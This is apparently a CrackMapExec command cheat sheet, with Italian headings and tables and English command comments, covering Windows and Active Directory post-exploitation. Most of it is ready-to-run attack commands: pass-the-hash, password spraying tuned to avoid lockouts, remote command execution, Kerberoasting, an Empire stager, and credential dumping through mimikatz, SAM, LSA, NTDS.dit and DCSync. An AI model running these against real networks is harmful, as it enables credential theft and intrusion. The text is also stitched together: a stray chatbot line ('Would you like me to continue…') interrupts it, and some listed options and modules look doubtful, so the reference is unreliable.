Foglio Comandi di CrackMapExec¶

Panoramica¶

CrackMapExec (CME) è uno strumento post-sfruttamento progettato per test di penetrazione e operazioni di red team in ambienti Windows/Active Directory. È spesso descritto come un "coltellino svizzero" per i test di penetrazione di rete, che consente l'enumerazione, il test delle credenziali e l'esecuzione di comandi su più protocolli.

⚠️ Avvertenza: CrackMapExec è uno strumento di test di sicurezza che dovrebbe essere utilizzato solo in ambienti per i quali si dispone di autorizzazione esplicita.

Installazione¶

Utilizzando pipx (Consigliato)¶

# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Install CrackMapExec
pipx install crackmapexec

Su Kali Linux¶

sudo apt update
sudo apt install -y crackmapexec

Da GitHub¶

git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install

Utilizzando Docker¶

docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexec

Utilizzo Base¶

Sintassi Generale¶

crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]

Protocolli Supportati¶

smb: Server Message Block
winrm: Windows Remote Management
ldap: Lightweight Directory Access Protocol
mssql: Microsoft SQL Server
ssh: Secure Shell
rdp: Remote Desktop Protocol
ftp: File Transfer Protocol

Specificazione Target¶

# Single target
crackmapexec smb 192.168.1.100

# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101

# IP range
crackmapexec smb 192.168.1.1-255

# CIDR notation
crackmapexec smb 192.168.1.0/24

# From file
crackmapexec smb targets.txt

Metodi di Autenticazione¶

Nome Utente e Password¶

# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'

# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'

# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'

# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

Pass-the-Hash¶

# NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'

# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt

Autenticazione Locale¶

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-auth

Autenticazione di Dominio¶

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAIN

Comandi Protocollo SMB¶

Enumerazione Base¶

# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares

# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users

# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups

# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

Esecuzione Comandi¶

Would you like me to continue with the remaining sections?```bash

Execute command¶

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

Execute PowerShell command¶

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

### File Operations
```bash
# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'

# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt

# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'

WinRM Protocol Commands¶

Basic Enumeration¶

# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'

Command Execution¶

# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

LDAP Protocol Commands¶

Basic Enumeration¶

# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain

# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers

# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts

Advanced Enumeration¶

# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description

# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation

# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate

# Search for ASREP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt

# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt

MSSQL Protocol Commands¶

Basic Enumeration¶

# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'

# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'

Command Execution¶

# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'

# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'

Module Usage¶

Module Management¶

# List available modules
crackmapexec <protocol> --list-modules

# Get module options
crackmapexec <protocol> -M <module> --options

# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2

Common Modules¶

Mimikatz¶

# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'

# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'

# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'

# Get DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'

Empire¶

# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http

PowerView¶

# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'

BloodHound¶

# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All

Lsassy¶

# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy

Enum_DNS¶

# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns

GOAD¶

# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goad

Advanced Techniques¶

Password Spraying¶

# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'

# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt

# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10

Credential Harvesting¶

# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa

# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds

Database Operations¶

Initialize Database¶

crackmapexec smb 192.168.1.0/24 --database

View Database¶

# List hosts
crackmapexec smb --database -L

# List credentials
crackmapexec smb --database -C

# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1

Common Options¶

Opzione	Descrizione
`-h, --help`	Mostra messaggio di aiuto ed esci
`-t THREADS`	Imposta il numero di thread concorrenti (predefinito: 100)
`--timeout TIMEOUT`	Imposta timeout per le connessioni (predefinito: 5 secondi)
`--verbose`	Attiva output dettagliato
`--debug`	Abilita output di debug
`--continue-on-success`	Continua i tentativi di autenticazione anche dopo il successo
`--no-bruteforce`	Nessun bruteforce, utilizzare solo le credenziali fornite
`--fail-limit LIMIT`	Numero di tentativi di accesso falliti prima di rinunciare a un host
`--jitter JITTER`	Aggiungi un ritardo casuale tra i tentativi di autenticazione (in secondi)
`--local-auth`	Eseguire l'autenticazione utilizzando account locali invece di account di dominio
`-d, --domain DOMAIN`	Dominio per l'autenticazione
`--no-output`	Non visualizzare l'output
`--output-file FILE`	Scrivi l'output su file
`--log`	Abilita la registrazione su file (predefinito: ~/.cme/logs/)

Opzione	Descrizione
`--shares`	Elenca azioni disponibili
`--sessions`	Elenca sessioni attive
`--disks`	Elenca dischi
`--loggedon-users`	Elencare gli utenti connessi
`--users`	Elencare utenti di dominio
`--groups`	Elencare gruppi di domini
`--local-groups`	Elenca gruppi locali
`--pass-pol`	Ottieni policy delle password
`--rid-brute [MAX_RID]`	Enumerare gli utenti tramite bruteforcing RID
`--sam`	Dump degli hash SAM
`--lsa`	Dump segreti LSA
`--ntds`	Dump NTDS.dit
`--exec-method \\{smbexec,wmiexec,mmcexec,atexec\\}`	Metodo per eseguire comandi

Opzione	Descrizione
`--users`	Elencare utenti di dominio
`--groups`	Elencare gruppi di domini
`--computers`	Elenco computer di dominio
`--domain`	Ottieni informazioni sul dominio
`--pass-pol`	Ottieni policy delle password
`--trusts`	Ottieni trust di dominio
`--asreproast [OUTFILE]`	Ottieni utenti AS-REP roastable
`--kerberoasting [OUTFILE]`	Ottieni utenti kerberoastable
`--trusted-for-delegation`	Ottenere utenti/computer con delega non vincolata
`--allowed-to-delegate`	Ottenere utenti/computer con delega vincolata

Opzione	Descrizione
`--port [PORT]`	Porta WinRM (predefinita: 5985)
`--ssl`	Utilizzare SSL per WinRM

Opzione	Descrizione
`--port [PORT]`	Porta MSSQL (predefinita: 1433)
`-q QUERY`	Esegui query SQL
- [Repository GitHub Ufficiale](
https://github.com/byt3bl33d3r/CrackMapExec)
- [Wiki di CrackMapExec](
https://github.com/byt3bl33d3r/CrackMapExec/wiki)
- [Guida all'Installazione di CrackMapExec](
https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation)
- [Documentazione dei Moduli di CrackMapExec](
https://github.com/byt3bl33d3r/CrackMapExec/wiki/Module-Documentation)